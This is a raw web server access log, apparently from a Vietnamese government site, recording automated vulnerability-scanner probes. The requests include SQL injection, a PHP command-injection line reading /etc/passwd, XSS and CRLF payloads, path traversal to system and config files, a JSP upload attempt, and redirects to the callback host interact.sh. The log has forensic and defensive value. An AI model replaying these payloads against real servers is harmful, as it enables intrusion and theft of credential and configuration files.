0 0 637 2023-10-15 07:20:08 103.153.214.94 GET /member/ajax_membergroup.php action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999999)+--+@`'` 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 07:23:09 103.153.214.94 GET /plus/download.php open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA== 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 07:23:18 103.153.214.94 GET /plus/flink.php dopost=save&c=cat%20/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 <?php+"system"($c);die;/*ref 200 0 0 201 2023-10-15 07:24:19 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=0 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 209 2023-10-15 07:24:19 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 200 2023-10-15 07:24:39 103.153.214.94 GET /api.php mod[]=auto 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 0 2 202 2023-10-15 07:24:46 103.153.214.94 GET /avatar_uploader.pages.inc file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204 2023-10-15 07:26:32 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 206 2023-10-15 07:26:33 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 208 2023-10-15 07:26:38 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 206 2023-10-15 07:26:40 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 204 2023-10-15 07:26:49 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 202 2023-10-15 07:26:57 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 203 2023-10-15 07:28:36 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 213 2023-10-15 07:30:01 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 208 2023-10-15 07:36:07 103.153.214.94 GET /index.php/javascript:alert(document.domain);dd// - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 210 2023-10-15 07:36:14 103.153.214.94 POST /WebReport/ReportServer op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/syIQCdFC.jsp 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 203 2023-10-15 07:36:15 103.153.214.94 GET /WebReport/syIQCdFC.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 205 2023-10-15 07:36:30 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 208 2023-10-15 07:36:32 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 1272 2023-10-15 07:36:34 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 451 2023-10-15 07:36:36 103.153.214.94 GET /WebReport/ReportServer op=chart&cmd=get_geo_json&resourcepath=privilege.xml 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 201 2023-10-15 07:36:37 103.153.214.94 GET /report/ReportServer op=chart&cmd=get_geo_json&resourcepath=privilege.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 07:39:05 103.153.214.94 GET /a'"><injectable> - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 07:40:42 103.153.214.94 GET / ucaslf=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 211 2023-10-15 07:40:43 103.153.214.94 GET / ucaslf=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200 2023-10-15 07:40:48 103.153.214.94 GET / l3ayue=9 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 202 2023-10-15 07:40:50 103.153.214.94 GET / l3ayue=9 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 07:40:59 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 211 2023-10-15 07:45:04 103.153.214.94 GET /嘍嘊Set-Cookie:crlfinjection=crlfinjection - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 202 2023-10-15 07:45:13 103.153.214.94 GET / Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 15 0 201 2023-10-15 07:45:15 103.153.214.94 GET / Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 205 2023-10-15 07:47:10 103.153.214.94 GET / q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 210 2023-10-15 07:47:12 103.153.214.94 GET / api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203 2023-10-15 07:47:13 103.153.214.94 GET / month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207 2023-10-15 07:47:15 103.153.214.94 POST /xmlrpc/pingback - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 203 2023-10-15 07:48:54 103.153.214.94 GET /api/v1/repos/search limit=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 0 2 229 2023-10-15 07:50:25 103.153.214.94 GET /users/sign_in - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 203 2023-10-15 07:52:13 103.153.214.94 GET /À®/À®/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 207 2023-10-15 07:52:16 103.153.214.94 GET /À®/À®/À®/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 07:52:18 103.153.214.94 GET /À®/À®/À®/À®/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205 2023-10-15 07:52:26 103.153.214.94 GET /WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205 2023-10-15 07:52:28 103.153.214.94 GET /WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206 2023-10-15 07:52:32 103.153.214.94 GET /À®/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 07:53:52 103.153.214.94 GET /plugin/sms5/ajax.sms_emoticon.php arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 210 2023-10-15 07:57:09 103.153.214.94 GET /mobile/shop/lg/mispwapurl.php LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204 2023-10-15 07:57:33 103.153.214.94 GET /bbs/new.php darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 08:01:26 103.153.214.94 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205 2023-10-15 08:01:45 103.153.214.94 GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 11 0 205 2023-10-15 08:01:54 103.153.214.94 GET /windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 08:02:03 103.153.214.94 GET /................windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 201 2023-10-15 08:02:21 103.153.214.94 GET /À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-15 08:02:30 103.153.214.94 GET / redirect=..%2f..%2f..%2f..%2fwindows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-15 08:02:38 103.153.214.94 GET / page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-15 08:02:47 103.153.214.94 GET / url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 598 2023-10-15 08:03:13 103.153.214.94 GET /À®À®/À®À®/À®À®/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207 2023-10-15 08:03:29 103.153.214.94 GET /index.php page=windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201 2023-10-15 08:03:37 103.153.214.94 GET /index.php page=windows/win.ini%00 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 08:03:45 103.153.214.94 GET /index.php page=../../windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 08:03:53 103.153.214.94 GET /index.php page=....//....//windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 206 2023-10-15 08:04:09 103.153.214.94 GET /.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 11 0 203 2023-10-15 08:04:22 103.153.214.94 GET /%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 11 0 209 2023-10-15 08:13:05 103.153.214.94 POST /eps/resourceOperations/upload.action - 443 - 193.123.37.162 MicroMessenger - 405 0 1 201 2023-10-15 08:14:48 103.153.214.94 GET /redirect-to url=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204 2023-10-15 08:19:16 103.153.214.94 GET /etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207 2023-10-15 08:20:08 103.153.214.94 GET /etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 08:21:01 103.153.214.94 GET /................etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-15 08:21:15 103.153.214.94 GET /etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-15 08:21:22 103.153.214.94 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 202 2023-10-15 08:21:30 103.153.214.94 GET /À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202 2023-10-15 08:21:37 103.153.214.94 GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 11 0 207 2023-10-15 08:22:05 103.153.214.94 GET /À®À®/À®À®/À®À®/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 08:22:19 103.153.214.94 GET /index.php page=etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 202 2023-10-15 08:22:26 103.153.214.94 GET /index.php page=etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 204 2023-10-15 08:22:33 103.153.214.94 GET /index.php page=../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 08:22:40 103.153.214.94 GET /index.php page=....//....//etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 200 2023-10-15 08:27:33 103.153.214.94 GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 11 0 207 2023-10-15 08:28:42 103.153.214.94 GET /etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206 2023-10-15 08:38:26 103.153.214.94 GET /help/index.jsp view=%3Cscript%3Ealert(document.cookie)%3C/script%3E 443 - 193.123.37.162 